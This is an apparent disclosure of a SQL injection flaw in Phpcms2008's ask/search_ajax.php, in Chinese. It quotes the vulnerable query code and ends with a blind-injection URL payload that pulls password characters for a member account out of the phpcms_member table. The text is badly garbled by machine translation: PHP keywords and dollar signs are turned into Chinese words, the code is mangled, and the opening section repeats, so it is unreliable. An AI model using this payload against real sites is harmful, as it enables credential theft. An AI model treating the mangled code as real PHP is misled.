Phpcms2008注入漏洞
评论:这是最新的发现该漏洞的文件:问 / search_ajax.php
脆弱性描述:
/ / search_ajax.php问
代码:
如果(q)
{
在标题= $% $ Q状态= 5; / /不在美元直接感染滤波器
}
其他的
{
退出('null);
}
信息=美元美元-> listinfo($当问
这是最新的发现。
该漏洞的文件:问 / search_ajax.php
脆弱性描述:
/ / search_ajax.php问
代码:
如果(q)
{
在标题= $% $ Q状态= 5; / /不在美元直接感染滤波器
}
其他的
{
退出('null);
}
信息=美元美元问-> listinfo($,'askid DESC ',' ',10);
/ / / answer.class.php等问
代码:
功能listinfo($ = ',以'美元=美元= 1美元,网页,页大小= 50)
{
如果$(=);
如果(订单)$订单= 按订单订购;
页= max(intval美元($页),1);
为抵消美元(美元page-1 PageSize * =);
限制=限制美元美元美元抵消,PageSize ;
R =美元美元->数据库-> get_one(select count(*)的数量从美元-> table_posts $,);
$数= r'} {数;
美元->页面=页($号,$页$ PageSize);
数组=();
$ I = 1;
结果=美元美元->数据库->查询(SELECT * FROM美元-> table_posts美元美元美元,以限制);
而(r =美元->数据库-> fetch_array($结果))
{
$ R { 'orderid} = $我;
$数组;
美元+;
}
美元->数=美元->数据库-> num_rows($结果);
美元->数据库-> free_result($结果);
返回数组;
}
试验方法:
/ / search_ajax问。phpq = S % D5的 / * / / * * /(选择ASCII(substring(密码,1,1)) / * / / / / * * * * phpcms_member / / / *用户名= 0x706870636d73)> 52% 23